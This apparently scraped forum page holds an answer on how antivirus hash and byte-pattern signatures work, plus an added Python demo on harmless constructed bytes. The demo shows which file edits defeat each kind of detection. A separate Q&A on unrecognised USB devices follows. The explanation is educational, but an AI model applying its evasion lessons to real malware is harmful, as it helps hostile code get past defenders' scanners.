For generic detection, if the pattern is in any sample with the HEX then it will be detected. This means a change in the bytes won't stop the product from detecting it, unless they removed the bytes from the application which consisted of the pattern of bytes the AV product had been picking up.

Hope that helped.

Cheers.
 

5 more replies
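
The difference between exact-hash and byte-pattern ("HEX") detection described in the answer above, as an added Python example that is not part of the original thread. The sample bytes, the signature labels and the `??` wildcard syntax are constructed for illustration and do not come from any vendor's product.

```python
import hashlib
import re

# Constructed, harmless bytes standing in for a file a vendor already detects.
MARKER = bytes([0xDE, 0xAD, 0x10, 0xBE, 0xEF])
ORIGINAL = b"HDR\x00\x01" + b"padding-" * 4 + MARKER + b"\x00trailer"

# Exact-match database: one SHA-256 per known file (hypothetical label).
HASH_DB = {hashlib.sha256(ORIGINAL).hexdigest(): "Example.Sample.A"}

# Generic database: hex byte patterns where "??" matches any single byte.
# The pattern syntax and the label are assumptions made for this example.
PATTERN_DB = {"Example.Generic": "DE AD ?? BE EF"}


def compile_hex_pattern(pattern):
    """Turn 'DE AD ?? BE EF' into a compiled bytes regex."""
    parts = []
    for token in pattern.split():
        if token == "??":
            parts.append(b".")  # wildcard: any one byte
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    # DOTALL so the wildcard also matches a newline byte (0x0A).
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_hex_pattern(p) for name, p in PATTERN_DB.items()}


def hash_detect(data):
    """Return the label for an exact SHA-256 match, or None."""
    return HASH_DB.get(hashlib.sha256(data).hexdigest())


def pattern_detect(data):
    """Return labels of every byte pattern found anywhere in the data."""
    return [name for name, rx in COMPILED.items() if rx.search(data)]


def scan(data):
    return {"hash": hash_detect(data), "generic": pattern_detect(data)}


def patch_byte(data, offset, value):
    """Return a copy of data with one byte replaced."""
    buf = bytearray(data)
    buf[offset] = value
    return bytes(buf)


MARKER_AT = ORIGINAL.index(MARKER)

# Three modified copies of the constructed sample.
APPENDED = ORIGINAL + b"\x00"                            # one byte added at the end
WILDCARD_EDIT = patch_byte(ORIGINAL, MARKER_AT + 2, 0x7F)  # edit under the ?? position
PATTERN_EDIT = patch_byte(ORIGINAL, MARKER_AT, 0x00)       # edit a fixed pattern byte

if __name__ == "__main__":
    cases = [
        ("original", ORIGINAL),
        ("byte appended", APPENDED),
        ("wildcard byte changed", WILDCARD_EDIT),
        ("pattern byte changed", PATTERN_EDIT),
    ]
    for label, data in cases:
        print(f"{label:24} {scan(data)}")
```

Any change to the file defeats the hash lookup, while the generic pattern keeps matching until one of its fixed bytes is altered, which is why products that rely on both kinds of signature behave differently in the modified-sample tests discussed in the question.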
Relevance 63.96%
Question: Usb Detection

Hi, I am having problem with my USB Ports. It can detect every old hardware that it has auto installed but recently it does not detect my new webcam and mp3 player when i plug them in. But the power is running perfectly alright. What should I do?

Answer:Usb Detection

Do you mean you can plug your USB printer in, turn it on and it works fine, turn it off and plug your mp3 player in to the same port and then turn it on and it will not be recognized? Make sure these things are removed properly (safely remove hardware) and if they were not you may have to uninstall then re-install the software for these devices.

5 more replies